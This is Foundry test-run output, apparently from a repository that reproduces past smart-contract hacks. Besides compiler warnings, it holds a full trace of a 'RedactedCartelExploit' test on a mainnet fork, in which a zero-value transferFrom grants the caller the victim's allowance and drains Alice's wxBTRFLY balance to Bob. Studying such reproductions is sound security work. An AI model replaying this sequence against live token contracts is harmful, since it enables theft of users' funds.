Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.24s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 549.40ms (1.78ms CPU time)

Ran 1 test for src/test/2022-03/RedactedCartel_exp.sol:RedactedCartelExploit
[PASS] testExploit() (gas: 118772)
Logs:
  Before the Exploit !
  Alice wxBTRFLY Token Balance:  89011248549237373700
  Bob wxBTRFLY Token Balance:  0
  --------------------------------------------------
  wxBTRFLY Allowance of Alice->AliceContract :  89011248549237373700
  wxBTRFLY Allowance of Alice->Bob(Before transferFrom):  0
  wxBTRFLY Allowance of Alice->Bob(After transferFrom):  89011248549237373700
  --------------------------------------------------
  After the Exploit !
  Alice wxBTRFLY Token Balance:  0
  Bob wxBTRFLY Token Balance:  89011248549237373700

Traces:
  [5830] RedactedCartelExploit::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 13908185 [1.39e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [143472] RedactedCartelExploit::testExploit()
    ├─ [0] VM::prank(0x20B92862dcb9976E0AA11fAE766343B7317aB349)
    │   └─ ← [Return]
    ├─ [5429] 0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C::unFreezeToken()
    │   ├─  storage changes:
    │   │   @ 5: 0x000000000000000000000120b92862dcb9976e0aa11fae766343b7317ab34912 → 0x000000000000000000000020b92862dcb9976e0aa11fae766343b7317ab34912
    │   └─ ← [Stop]
    ├─ [0] console::log("Before the Exploit !") [staticcall]
    │   └─ ← [Stop]
    ├─ [2491] 0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C::balanceOf(0x9ee1873ba8383B1D4ac459aBd3c9C006Eaa8800A) [staticcall]
    │   └─ ← [Return] 89011248549237373700 [8.901e19]
    ├─ [0] console::log("Alice wxBTRFLY Token Balance: ", 89011248549237373700 [8.901e19]) [staticcall]
    │   └─ ← [Stop]
    ├─ [2491] 0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C::balanceOf(0x78186702Bd66905845B469E3b76d4FD63F8722d4) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] console::log("Bob wxBTRFLY Token Balance: ", 0) [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("--------------------------------------------------") [staticcall]
    │   └─ ← [Stop]
    ├─ [0] VM::prank(0x9ee1873ba8383B1D4ac459aBd3c9C006Eaa8800A)
    │   └─ ← [Return]
    ├─ [24559] 0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C::approve(0x0f41d34B301E24E549b7445B3f620178bff331be, 89011248549237373700 [8.901e19])
    │   ├─ emit Approval(owner: 0x9ee1873ba8383B1D4ac459aBd3c9C006Eaa8800A, spender: 0x0f41d34B301E24E549b7445B3f620178bff331be, value: 89011248549237373700 [8.901e19])
    │   ├─  storage changes:
    │   │   @ 0xe87acac2608c452546ee31e0f2f90fd0abdd5b81e8a2ae00c2625259db1e52bd: 0 → 0x000000000000000000000000000000000000000000000004d3477af4274c3b04
    │   └─ ← [Return] true
    ├─ [639] 0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C::allowance(0x9ee1873ba8383B1D4ac459aBd3c9C006Eaa8800A, 0x0f41d34B301E24E549b7445B3f620178bff331be) [staticcall]
    │   └─ ← [Return] 89011248549237373700 [8.901e19]
    ├─ [0] console::log("wxBTRFLY Allowance of Alice->AliceContract : ", 89011248549237373700 [8.901e19]) [staticcall]
    │   └─ ← [Stop]
    ├─ [2639] 0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C::allowance(0x9ee1873ba8383B1D4ac459aBd3c9C006Eaa8800A, 0x78186702Bd66905845B469E3b76d4FD63F8722d4) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] console::log("wxBTRFLY Allowance of Alice->Bob(Before transferFrom): ", 0) [staticcall]
    │   └─ ← [Stop]
    ├─ [0] VM::prank(0x78186702Bd66905845B469E3b76d4FD63F8722d4)
    │   └─ ← [Return]
    ├─ [28083] 0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C::transferFrom(0x9ee1873ba8383B1D4ac459aBd3c9C006Eaa8800A, 0x0f41d34B301E24E549b7445B3f620178bff331be, 0)
    │   ├─ emit Transfer(from: 0x9ee1873ba8383B1D4ac459aBd3c9C006Eaa8800A, to: 0x0f41d34B301E24E549b7445B3f620178bff331be, value: 0)
    │   ├─ emit Approval(owner: 0x9ee1873ba8383B1D4ac459aBd3c9C006Eaa8800A, spender: 0x78186702Bd66905845B469E3b76d4FD63F8722d4, value: 89011248549237373700 [8.901e19])
    │   ├─  storage changes:
    │   │   @ 0x8021fb560c52962d7f0efdf3c5d7a6c6757b9ed1a2e6ac631b533bf7ef1d1b68: 0 → 0x000000000000000000000000000000000000000000000004d3477af4274c3b04
    │   └─ ← [Return] true
    ├─ [639] 0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C::allowance(0x9ee1873ba8383B1D4ac459aBd3c9C006Eaa8800A, 0x78186702Bd66905845B469E3b76d4FD63F8722d4) [staticcall]
    │   └─ ← [Return] 89011248549237373700 [8.901e19]
    ├─ [0] console::log("wxBTRFLY Allowance of Alice->Bob(After transferFrom): ", 89011248549237373700 [8.901e19]) [staticcall]
    │   └─ ← [Stop]
    ├─ [0] VM::prank(0x78186702Bd66905845B469E3b76d4FD63F8722d4)
    │   └─ ← [Return]
    ├─ [28883] 0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C::transferFrom(0x9ee1873ba8383B1D4ac459aBd3c9C006Eaa8800A, 0x78186702Bd66905845B469E3b76d4FD63F8722d4, 89011248549237373700 [8.901e19])
    │   ├─ emit Transfer(from: 0x9ee1873ba8383B1D4ac459aBd3c9C006Eaa8800A, to: 0x78186702Bd66905845B469E3b76d4FD63F8722d4, value: 89011248549237373700 [8.901e19])
    │   ├─ emit Approval(owner: 0x9ee1873ba8383B1D4ac459aBd3c9C006Eaa8800A, spender: 0x78186702Bd66905845B469E3b76d4FD63F8722d4, value: 0)
    │   ├─  storage changes:
    │   │   @ 0xc08e21013c194c2b3c2ef517211b63b9b68e4947a71b861a77c07d4a7f09be25: 0x000000000000000000000000000000000000000000000004d3477af4274c3b04 → 0
    │   │   @ 0x8021fb560c52962d7f0efdf3c5d7a6c6757b9ed1a2e6ac631b533bf7ef1d1b68: 0x000000000000000000000000000000000000000000000004d3477af4274c3b04 → 0
    │   │   @ 0xee2c1a19a61424d6772ede37a277ee1d5618f023237036a155b8d175c28dc57f: 0 → 0x000000000000000000000000000000000000000000000004d3477af4274c3b04
    │   └─ ← [Return] true
    ├─ [0] console::log("--------------------------------------------------") [staticcall]
    │   └─ ← [Stop]
    ├─ [0] console::log("After the Exploit !") [staticcall]
    │   └─ ← [Stop]
    ├─ [491] 0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C::balanceOf(0x9ee1873ba8383B1D4ac459aBd3c9C006Eaa8800A) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] console::log("Alice wxBTRFLY Token Balance: ", 0) [staticcall]
    │   └─ ← [Stop]
    ├─ [491] 0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C::balanceOf(0x78186702Bd66905845B469E3b76d4FD63F8722d4) [staticcall]
    │   └─ ← [Return] 89011248549237373700 [8.901e19]
    ├─ [0] console::log("Bob wxBTRFLY Token Balance: ", 89011248549237373700 [8.901e19]) [staticcall]
    │   └─ ← [Stop]
    ├─  storage changes:
    │   @ 0x8021fb560c52962d7f0efdf3c5d7a6c6757b9ed1a2e6ac631b533bf7ef1d1b68: 0 → 0x000000000000000000000000000000000000000000000004d3477af4274c3b04
    │   @ 0xe87acac2608c452546ee31e0f2f90fd0abdd5b81e8a2ae00c2625259db1e52bd: 0 → 0x000000000000000000000000000000000000000000000004d3477af4274c3b04
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 3.75s (2.26s CPU time)

Ran 2 test suites in 3.76s (4.30s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
